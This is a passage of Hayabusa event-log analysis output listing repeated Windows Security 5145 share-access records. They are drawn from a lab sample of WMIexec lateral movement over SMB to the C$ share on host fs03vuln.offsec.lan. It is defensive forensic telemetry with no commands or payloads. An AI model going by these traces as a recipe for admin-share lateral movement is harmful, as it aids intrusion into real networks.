Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2#\d75626a8ff89596aee2cf2c9eb554cbf | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via 
SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90#\62095b976d2affb993898b2e9f88c475 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a#\f39c57237f98d69b4abdc9e3907d8fe7 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479#\9fd6e8c8110ccd01fd6745507b906c04 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b#\ec2e3c1e16b1d1427b32d2f2babf99bc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084#\a9175ff6a1a8784975c70e9933314ecd | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5#\c7ef2b5b5fc4335bef3148904cb3f0e5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a#\a5c640ad1645775e93d560f67f3ea1d1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e#\865873dc1b8af370b7a314c3c89dcfd0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168#\9d5a241e9cf3bdb8312058004ea269f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\68828aa1ea98316a22a4d8488267b07b | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b#\7cb1fc2895121ae7e24841bd0c24b25e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via 
SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656#\e1349161320cee221fb339c41ab73546 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83#\59420f153f7bb0ef6f63e75d08020c8c | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\433ad5082c48708eb6acf6fa065c1461 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5#\87b325b56b362a5d2dca93029c0d75b8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786#\8078dc8e65f16bfd95c09cce4fe0280e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.780 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611#\54330dabd4f5e29c758461cbbf2a4f34 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1#\50399e243bf8da1addc23305521efbd9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe#\174cd66357bfa0b262b0dbd9bd0e64e3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce#\f05e09fe4c0d9354867afe11b4e9db8c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.811 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\89e812888a4e94f1d2bf0da1c4c6ee5b | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb#\f3228ac51b37737ae2ce1176bbbad2ce | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via 
SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136#\cabc62ca2a04f99fe9af65799a727687 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\1617c5f47d154a5d7cf1f53851398006 | IP Addr: 10.23.23.9 | LID: 
